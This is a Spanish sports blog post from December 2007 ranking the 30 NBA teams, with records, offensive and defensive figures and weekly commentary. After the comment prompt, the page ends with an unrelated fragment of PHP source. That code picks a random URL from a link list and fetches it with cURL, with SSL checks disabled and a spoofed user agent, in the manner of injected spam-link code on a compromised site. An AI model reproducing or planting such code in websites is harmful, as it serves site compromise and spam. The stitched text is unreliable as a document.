El termómetro de la NBA

27 de December de 2007 por telekoman

Esta semana ha servido para varias cosas. Por un lado para que Portland amplíe su racha a 11 triunfos consecutivos y suba otros 4 puestos en nuestro ranking. También ha servido para que Boston, Detroit y San Antonio acumulen 20 victorias o más y para que Boston pierda su condición de invicto en casa a manos de Detroit. El Oeste se aprieta y hay demasiados equipos en un margen muy estrecho. En el Este Washington desfallece y se mete de lleno en la pelea por las últimas plazas de playoffs mientras que Boston, Detroit y Orlando continúan adelante. Los equipos de abajo cada vez están más abajo y Minnesota y Miami luchan por tener más oportunidades que nadie en el próximo draft. Kobe Bryant por su parte ha inscrito su nombre de nuevo en los libros de historia al ser el jugador más joven en superar los 20.000 puntos anotados y supera a Tom Chambers en la lista de anotadores situándose en el puesto 30.

En clave española esta semana sólo podemos destacar a Calderón que sigue aprovechando su oportunidad para situarse entre los mejores directores de juego de la NBA. Mientras Gasol y Navarro continúan con su travesía por el desierto de Memphis y Sergio Rodriguez, aunque no está jugando todo lo que nos gustaría en estos buenos Portland, sigue aportando asistencias y puntos en los minutos de los que dispone.

Equipos que más suben: Portland Trail Blazers y Atlanta Hawks (4), Golden State (3)

Equipos que más bajan: Toronto Raptors, Washington Wizards y Milwaukee Bucks (4)

Equipo (Posición anterior) Balance Ataque / Defensa

Comentario


1

Boston (1)

23 – 3 100,0 (11) / 85,9 (1) Era evidente que en algún momento tenía que acabar, y que para que sucediera tendría que pasar un gran equipo por el Boston Garden. Y ese equipo ha sido Detroit, como no podía ser de otra manera, que ha dejado a Boston con una racha ganadora en casa de 12 partidos consecutivos. Y para confirmar que pocos más podrán hacer lo mismo, los Celtics han pasado literalmente por encima de Chicago, Orlando y Sacramento. Y para que las buenas noticias no decaigan en esta Navidad para los aficionados de Boston, Rajon Rondo, el base titular, se une al “Big Three” firmando no sólo buenas actuaciones en la dirección, si no también en la anotación como contra Orlando, donde consiguió 23 puntos. Después de una semana muy casera, los Celtics despiden el año con 3 enfrentamientos fuera de casa ante Seattle, Utah y Lakers e inician su primera gira por el Oeste.

2

Detroit (4)

21 – 7 98,9 (13) / 89,5 (2) Semana perfecta y triunfal para Detroit que llegan a las 21 victorias y consiguen quitar a Boston la etiqueta de “Imbatido”. Empresa esta nada fácil y que necesitó del mejor Chauncey Billups para que fuera posible. Está claro que Detroit ha llegado al fin de año en una gran forma y que es capaz de manejar el ritmo de los partidos a su antojo. Los 27 puntos de diferencia ante Memphis, los 12 ante Houston y los 18 ante Nets así lo corroboran. Además ya cuentan de nuevo en sus filas con el rookie Stuckey, que tras perderse el primer tercio de la liga con una rotura en su mano izquierda, ha vuelto a participar en los partidos, con poco acierto de momento.

3

San Antonio (2)

20 – 7 99,4 (12) / 92,4 (3)

La incidencia de un único jugador en un deporte de equipo como el baloncesto es siempre relativa, pero podemos decir que en hombres como Duncan, Ginobili o Parker la importancia es alta y los resultados nos lo demuestran. Los Spurs, sin Tony Parker, fueron derrotados sin excesivos problemas pr los Suns a principio de semana, en casa. Puede ocurrir, incluso con Parker, ya que el equipo de Phoenix es de los mejores de la liga. Más extraño resulta la derrota ante Memphis, en un partido cerrado, propicio para las habilidades de los Spurs. La victoria al final de la semana frente a Clippers, ya con Parker al mando de las operaciones debe restablecer el orden lógico en el equipo tejano. Con una semana ligera, con 2 partidos en casa ante Toronto y Memphis, los Spurs seguirán intentando distanciarse de sus perseguidores e incluso intentar alcanzar a Boston y Detroit.


4

Phoenix (3)

19 – 9 109,7 (1) / 104,9 (27) Esta semana Phoenix retrocede un puesto tras 4 partidos irregulares ante algunos de los mejores equipos de la liga. Consiguieron derrotar a San Antonio en su feudo, los primeros en conseguirlo, y ganaron en casa cómodamente a Toronto pese al monstruoso partido de Bosh con 42 puntos, pero perdieron primero ante Dallas y luego ante los Lakers de Kobe y Bynum. Nash sigue sentando cátedra en casi cada partido, y la incorporación de un rejuvenecido Grant Hill está haciendo que los equipos tengan que multiplicarse en defensa si quieren parar el aluvión de juego rápido de unos Suns que encabezan el índice de ataque con 109,7 puntos por partido. Un doble enfrentamiento con Clippers y una visita a Sacramento no parece impedimiento suficiente para que los de Phoenix no lleguen a las 20 victorias antes de fin de año.

5

Dallas (6)

19 – 10 101,6 (9) / 98,2 (12) Lentamente la bestia despierta. El juego que llevó a Nowitzky a proclamarse MVP de la pasada temporada empieza a asomarse por las canchas de la NBA, y eso indudablemente es bueno para el espectáculo, pero malo para los rivales de Dallas. Esta semana ha vuelto a ser casi perfecta, con 3 victorias en 4 encuentros. 31 puntos y casi 9 rebotes son la media del alemán en los 3 encuentros. Los dos primeros, resueltos con pequeñas diferencias en el marcador, han conseguido despertar al atacante furibundo que Dirk lleva dentro. Será interesante ver cual de los tres gallitos del Oeste que están por debajo de San Antonio consigue llegar primero a las 20 victorias y cual de ellos está al frente de la Conferencia Oeste al llegar el fin de año. Cleveland y Atlanta son los obstáculos de Dallas para esta semana que empieza.

6

Orlando (5)

19 – 11 103,1 (7) / 99,6 (17)

Ya en el anterior Termómetro dijimos que la semana no iba a ser nada fácil para unos Magic que estaban dando muestras de flaqueza. Efectivamente así ha sido y Orlando sólo ha sido capaz de ganar uno de los 4 partidos que ha disputado, cayendo frente a Dallas, Utah y Boston. Afortunadamente para ellos, los Knicks se han curuzado en su camino permitiéndoles ganar el último partido de la semana. Siguen liderando la División SouthEast, pero es más gracias al desplome de Washington que a méritos propios. Las razones de esta caída hay que buscarlas en la bajada de prestaciones de Nelson y de Lewis, aquejado de dolencias en el cuello. La posible lesión de Turkoglu siembra de incertidumbre la a priori tranquila semana de Orlando que con partidos ante Heat, Bobcats y Bulls quieren alejar las dudas que estas 3 semanas pasadas han dejado.


7

L.A. Lakers (8)

18 – 10 106,4 (4) / 101,3 (22) Tan sólo LeBron James ha sido capaz de amargarle a Kobe la semana de Navidad, y eso que era larga y repleta de contricantes. Bryant ha vuelto a entrar en los libros de historia y estadística de la NBA, y por partida doble. En la misma semana ha sido capaz de coronarse como Jugador más joven en llegar a los 20.000 puntos y de situarse en el puesto 30 de la lista de los mejores anotadores de la historia desplazando para ello a Tom Chambers. Pero el mejor regalo de estas navidades para Kobe estaba en su equipo. Tras un movido verano lleno de rumores sobre su posible marcha si no traían a los Lakers a algún jugador capaz de mejorar sustancialmente el equipo, se ha visto que ese jugador ya estaba en casa. El papel que está desempeñando Andrew Bynum en el equipo, y el futuro que aporta, es brillante y junto al renacimiento de Odom, puede hacer que los Lakers adquieran de nuevo un papel relevante en la liga. Esta semana será relajada en cuanto al número de partidos, pero la visita de Utah y Boston no puede dejar a nadie indiferente.

8

New Orleans (7)

18 – 10 97,0 (17) / 93,6 (4) Los Hornets bajan un puesto esta semana en la que todo habría resultado perfecto de no haberse cruzado en el camino de Portland. Con partidos ante equipos inferiores en la teoría y en la práctica, como Seattle y Minnesota, los Hornets dan un paso adelante en su intento de clasificarse para Playoffs en una conferencia Oeste que este año está más disputada que nunca. Chris Paul continúa con su curso acelerado de dirección de juego y se sitúa tercero en la clasificación de máximos asistentes de la liga con una media de 10 por partido, 12,6 en la última semana, tras Nash y Kidd. La semana se inicia visitando Charlotte y dejando para el final la visita de Cleveland y Toronto. Un calendario asequible para intentar acercarse a las 20 victorias que todos anhelan.

9

Denver (9)

17 – 11 106,8 (3) / 103,3 (25)

Al igual que en los Hornets, la semana habría sido perfecta de no ser por Portland que se está empeñando en intranquilizar al líder de la división NorthWest, del que sólo separa partido y medio. El resto de la jornada han sido dos victorias sobre Houston y Sacramento, ambas por la mínima, y la holgada victoria de hoy sobre Milwaukee. El equipo sigue descansando sobre los hombros de Iverson, 30 puntos y 6 asistencias de media, y Melo, 33,6 puntos y 8 rebotes de media esta semana . Sin embargo los héroes de las victorias fueron Anthony Carter y Linas Kleiza que anotaron las canastas ganadoras y Marcus Camby que consiguió frente a Milwaukee el primer triple doble de su carrera con 10 tapones. Un doble enfrentamiento contra Golden State espera a los anárquicos jugadores de los Nuggets.


10

Golden State (13)

17 – 12 108,1 (2) / 106,2 (30) Tan sólo la tripleta de los Nets ha conseguido esta semana ganar a unos Warriors que suben posiciones en nuestro Termómetro copando junto a Portland la última plaza que da acceso a los Playoffs. Para conseguir esta victoria los Nets consiguieron entorpecer la dirección de Baron Davis hasta el extremo de que el buen base sólo repartió 3 asistencias. Está claro que parando a Davis paras gran parte de las opciones de victoria de los de Nelson, que ven como su juego rápido y agresivo en ataque se vuelve lento y previsible. Pero parar a Davis no está al alcance de todos los equipos, y Memphis, Minnesota, 2 veces, y Cleveland pueden dar fe de ello esta semana. El doble enfrentamiento contra Denver puede ser decisivo a la hora de resolver posibles empates de cara a la clasificación final.

11

Portland (15)

16 – 12 95,3 (20) / 96,3 (9) Portland continúa con su racha triunfal y ya acumula 11 victorias consecutivas, lo cual le ha valido para situarse sólo a medio partido del líder de la División NorthWest, Denver. Pero la liga es larga y las derrotas vendrán. Mientras tanto en Portland se están frotando las manos viendo el equipo que están montando para el año que viene, cuando Oden esté completamente restablecido y sus jóvenes estrellas, Roy, Aldridge y Webster estén a pleno funcionamiento. Ante la baja forzosa de Oden, Roy está demostrando que su título de Rooky del Año de la pasada temporada no fue concedido por casualidad. Con enfrentamientos ante Minnesota y Philadelphia, es bastante probable que los Trail Blazers lleguen a las 13 consecutivas en este fin de año y el calendario es propicio para llegar al menos a las 17, lo que supondría la mejor racha de la historia de la franquicia.

12

Utah (10)

16 – 14 104,7 (5) / 99,7 (18)

Utah continúa mostrandose como un equipo casero. Con 10 victorias y 2 derrotas los Jazz se muestran casi intratables en casa como esta noche en la que han vencido a Dallas con autoridad. Pero el balance fuera de casa es bastante decepcionante, 12 derrotas y sólo 6 victorias. Esta semana el balance fuera de casa ha sido de 3 derrotas ante equipos asequibles Atlanta, Charlotte y Miami y una victoria frente a Orlando. Esta claro que si los pupilos de Sloan quieren clasificarse para Playoffs van a tener que apretar el acelerador fuera de Slat Lake City. El calendario de la semana que viene es pavoroso, visitando a los Lakers y recibiendo a Boston y Portland.


13

Atlanta (17)

15 – 12 94,9 (21) / 94,9 (7) 5 victorias consecutivas permiten a Atlanta ponerse con un balance muy prometedor de 15-12, en cuarta posición del Este y a sólo 2 partidos y medio del líder de su División Orlando. Esta semana, con equipo de la zona media de la tabla, han sido capaces de ganar los 4 encuentros disputados, 3 de ellos en casa. La temporada es larga, pero los equipos del Este, excepto Boston y Detroit, estan dando facilidades y eso puede favorecer a los Hawks en su intento de clasificarse para playoffs. La semana que viene será en extremo relajada con sólo un partido en casa de Dallas.

14

Indiana (14)

15 – 14 104,1 (6) / 104,2 (26) El equipo gestionado por Larry Bird se mantiene en el puesto decimocuarto tras haber ganado a New York, Philadelphia y Washington y haber perdido contra Minnesota y Atlanta. En condiciones normales, ni la victoria frente a los Knicks habría sido por 27 puntos de diferencia, ni la derrota ante Minnesota, que llegó a 131 puntos, se hubiera producido. Pero así son los Pacers, enzarzados con Toronto, Atlanta y Washington por la 4ª plaza del Este, son capaces de generar mucho juego de ataque y de permitir demasiado en defensa. La semana se presenta complicada con un doble enfrentamiento con Detroit y una visita a Charlotte, por lo que es bastante probable que baje en nuestro próximo Termómetro.

15

Toronto (11)

15 – 14 98,0 (15) / 96,1 (8)

Mala semana para el equipo canadiense que retrocede cuatro puestos en nuestro ranking tras haber ganado sólo 1 de los 4 encuentros disputados. En esta semana se han puesto en evidencia todas las carencias del equipo. Bosh, su jugador franquicia está en buena forma, como demostró ante Phoenix al acabar el partido con 42 puntos y 13 rebotes, pero la capacidad anotadora del equipo está bajo mínimos. Lo único bueno, al menos desde la óptica española, es que jose Manuel Calderón está teniendo su mejor temporada. El base extremeño es sexto en la clasificación de asistencias con 8 de media, segundo por delante de Kidd y por detrás de Nash si miramos el índice de asistencias por 48 minutos y primero en el índice asistencias/pérdidas que demuestra su fiabilidad.


16

Washington (12)

14 – 13 100,2 (10) / 99,0 (16) La semana de los Wizards ha sido bastante mala y sólo a última hora ha podido levantar algo el vuelo con su victoria por 4 puntos ante los Bobcats que cortaba una racha de 3 derrotas consecutivas. Parece claro que con sólo 2 jugadores anotando, Caron Butler y Antawn Jamison el presente de la franquicia de la capital estadounidense es bastante complicado. Como recambio a la baja de Arenas, ha aparecido, y con evidente acierto, Roger Mason para ayudar a ganar el partido frente a Charlotte con puntos y defensa. Pero dudamos que sea un jugador que pueda aportar al equipo de manera permanente. Lo veremos la próxima semana ante dos equipos a priori asequibles como Nets y Heat.

17

Houston (16)

13 – 15 94,7 (22) / 94,3 (5) La caída de los Rockets continúa y esta semana pierden un nuevo puesto debido en parte a los problemas de pequeñas lesiones de McGrady. El diagnóstico de Houston es complicado. No está claro si el problema radica en que el equipo no es capaz de apoyar a McGrady y Yao o en si es imposible apoyar a estos dos jugadores por su tipo de juego. Lo que sí está claro es que cuando a los dos jugadores franquicia se les une el esfuerzo de los demás integrantes de la plantilla, Houston es capaz de ganar a cualquiera, como sucedió ante Chicago.

18

Cleveland (19)

13 – 16 96,4 (18) / 100,3 (19)

Finalmente la semana ha sido buena. Con 4 de los 5 partidos jugándose en casa, el equipo de LeBron James no tenía escusas para no ganar y más tras la reincorporación de Varejao. Excepto por el tropiezo frente a los Warriors, los Cavaliers consiguieron dominar a Milwaukee, Lakers y Miami y aunque perdieron en su visita al Madison, se sitúan en la última plaza que da derecho a entrar en Playoffs. La visita a dos equipos del Oeste, Dallas y New Orleans, serán los próximos compromisos del equipo de LeBron.


19

Philadelphia (20)

12 – 16 93,7 (26) / 94,4 (6) Philadelphia sube un puesto a costa de sus victorias ante Memphis y Miami. Tiene muy difícil entrar en la lucha por los Playoffs, pero lo que está claro es que su juego es bastante mejor que el de los equipos que están por debajo. Creo que su meta debería ser acercarse al balance de victorias y derrotas y con eso su temporada podría considerarse buena, en espera de que el equipo termine de madurar.

20

New Jersey (21)

12 – 16 91,6 (29) / 97,1 (11) Parecía que los Nets habían vuelto a encontrar el rumbo perdido después de las victorias ante Miami y en especial frente a los Warriors,donde jugaron un gran encuentro. Pero la derrota frente a Detroit de esta noche por 18 puntos vuelve a hacer dudar a los aficionados. Esta semana tienen dos enfrentamientos con rivales directos del Este para entrar en playoffs como Wizards y Bucks. Estos partidos se antojan muy importantes de cara a deshacer posibles empates al finalizar la temporada regular. Esta semana debe continuar por su viaje por el Oeste para enfrentarse a Sacramento y Portland y volver al Este a la cancha de Seattle. Si consigue ganar 2 de los 3 podrá considerar que la semana ha estado bien.

21

Sacramento (22)

11 – 16 97,9 (16) / 100,9 (21)

Una lástima el partido perdido ante Denver por 1 tras el tiro final de Linas Kleiza. Si hubieran ganado ese partido los Kings habrían acabado la semana con 3 victorias y una única y previsible derrota frente a Boston y subirían 3 puestos en lugar de uno. Pero este es el sino de un equipo en proceso de reconstrucción con muy buenos pero jóvenes jugadores que dará en un futuro cercano muchas alegrías a sus aficionados. Esta semana continúan quedándose en casa para recibir a Philadelphia y a Phoenix.


22

Milwaukee (18)

11 – 16 95,7 (19) / 100,9 (20) Los Bucks pierden 4 puestos esta semana tras haber perdido 3 de los 4 encuentros disputados, siendo capaces únicamente de ganar a Charlotte y siendo apabullados por Denver. El equipo se encuentra en una clara crisis, fuera de playoffs y siendo dominado partido tras partido en casi todas las facetas del juego. Los porcentajes de tiro son malos, al equipo le cuesta rebotear y en la dirección Mo Williams tiene que multiplicarse. La semana que viene, los Bucks tendrán que aprovechar los partidos frente a Chicago y New Jersey para intentar sumar victorias ya que después tendrán que visitar Detroit.

23

Charlotte (25)

10 – 16 93,3 (27) / 98,3 (14) Los Bobcats podrían haber subido mucho más de haber ganado hoy a los Wizards. Este partido es perfecto para ver como se puede ganar al equipo de Charlotte. La aportación de Mohammed al juego ofensivo es escasa, aunque aporta intimidación en defensa e intensidad en el rebote, pero en parte entorpece el juego de Okafor que en los últimos partidos ha bajado ligeramente su media de puntos. Por otra parte, libera ligeramente de la responsabilidad reboteadora a Gerald Wallace, lo que le permite centrarse más en ataque. Pero el equipo no carbura si Felton no está suelto. La semana que viene tienen tres partidos contra equipos con buenos bases como Paul, Nelson y Tinsley que no destacan por su aportación en defensa. Veremos si son capaces de imponerse.

24

L.A. Clippers (23)

9 – 17 93,3 (28) / 98,2 (13)

Pocas cosas más les pueden pasar a los Clippers. Sólo falta Kaman por pasar por la enfermería. Aún así son capaces de mantener los partidos en unos límites aceptables, pero debido a la falta de efectivos suelen perder por simple agotamiento y falta de ideas. Esta semana han perdido de 3 ante Toronto, de 13 ante Dallas y de 9 ante unos Spurs con un Duncan imponente. Su poder interior es enorme con Kaman y el rookie Thornton, pero están muy limitados por fuera. Y para complicar las cosas un poco más, esta semana se presenta con un doble enfrentamiento con Phoenix del que sólo pueden salir derrotas.


25

Chicago (24)

9 – 17 91,5 (30) / 96,6 (10) Finalmente el vaso se colmó y se derramó por el lado más débil. Scott Skiles. El entrenador fue cesado de su cargo el día siguiente al partido disputado frente a Houston que se saldó con una derrota por 18 puntos y en el que el banquillo de los Bulls se mostró incapaz de contrarrestar al banquillo tejano. El ya ex-entrenador no ha sido capaz de reconducir a su equipo con alguna variante y se ha empeñado en mantener el mismo quinteto titular y las mismas rotaciones que evidentemente no han funcionado a lo largo de toda la temporada. Aún no se conoce el nombre de su sustituto que sin duda tendrá un duro trabajo por delante para intentar clasificar a los Bulls para Playoffs.

26

Memphis (26)

8 – 20 101,7 (8) / 105,4 (29) Los Grizzlies son sin duda uno de los equipos más difíciles de explicar de la NBA. Su capacidad de ataque es grande y la victoria ante los Spurs lo atestigua, pero su defensa es lastimosa y eso les hace perder muchísimos partidos. En el momento en que se enfrentan a un equipo que les presiona un poco en la línea de creación caen con estrépito como ante Detroit, donde perdieron de 27 puntos que pudieron ser más. Ante equipos más asequibles, como Philadelphia, y con Gasol funcionando al máximo rendimiento, tienen gandes problemas de concentración y caracter en los últimos momentos que les hacen perder. La sombra de los trades es alargada y es posible que la franquicia cambie de rumbo, pero hasta que eso suceda, los aficionados seguirán viendo perder a su equipo.

27

Seattle (28)

8 – 20 98,1 (14) / 105,1 (28)

La semana podría haber sido pésima para el equipo de Seattle con las derrotas ante Hornets y Portland, pero un gran partido de todo el equipo ante Toronto ha permitido que Seattle se sume al grupo de equipos con 8 victorias. Kevin Durant continúa con su paseo militar para conseguir el ROY con 22,6 puntos de media y es ocasionalmente acompañado por Wally, Collison, Wilcox, etc. De aquí a fin de año les queda esperar que la apisonadora verde que son los Celtics no les aplaste demasiado y les deje con algo de fuerzas para derrotar a Minnesota.


28

New York (27)

8 – 20 94,5 (23) / 102,1 (23) Nueva semana catastrófica para los Knicks que sólo han conseguido 1 victoria en los 5 partidos que han disputado y eso que 3 de ellas han sido en el Madison. Especialmente sangrante la derrota ante Indiana por 27 puntos. El equipo es un absoluto desastre y no tiene visos de cambiar mientras que Thomas esté en el banquillo y en el organigrama de los Knicks. La falta de defensa es alarmante, algo que todo el mundo sabía a principios de temporada viendo la plantilla, y el ataque no funciona. El juego interior es prácticamente nulo y eso es algo que teniendo a David Lee en el banquillo debería evitarse. Lo único decente que ha pasado en el Madison es el record de Kobe Bryant. Si Frasier levantara la cabeza…

29

Miami (29)

8 – 21 94,0 (24) / 98,8 (15) Las tensiones generadas por las declaraciones de algunos de los miembros de la plantilla de Miami sobre el rendimiento de otros jugadores no parece que hayan tenido ningún tipo de efecto positivo y Miami continua siendo el peor equipo del Este y uno de los peores de toda la NBA. Y para continuar con las malas noticias, Alonzo Mourning se lesiona de gravedad lo que puede suponer el adios definitivo del gran pivot que ya había declarado que esta sería su última temporada en activo. Todo un baluarte defensivo que nos abandona.

30

Minnesota (30)

4 – 23 93,9 (25) / 102,1 (24)

Los aficionados de Minnesota todavía deben de estar frotándose los ojos con lo ocurrido ante Indiana. Que los Timberwolves lleguen a 131 puntos sin ninguna prorroga es algo por lo que difícilmente nadie apostaría ni un solo euro. Y sin embargo sucedió. Jefferson 29 puntos, Telfair 27, Davis 23 y 7 jugadores con 10 o más puntos. Claro que eso es flor de un día y en el partido siguiente Minnesota perdió frente a los Hornets de 34. Esta semana continúan con su ronda de visitas llendo a Portland, Seattle y Los Angeles para ver a los Clippers.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>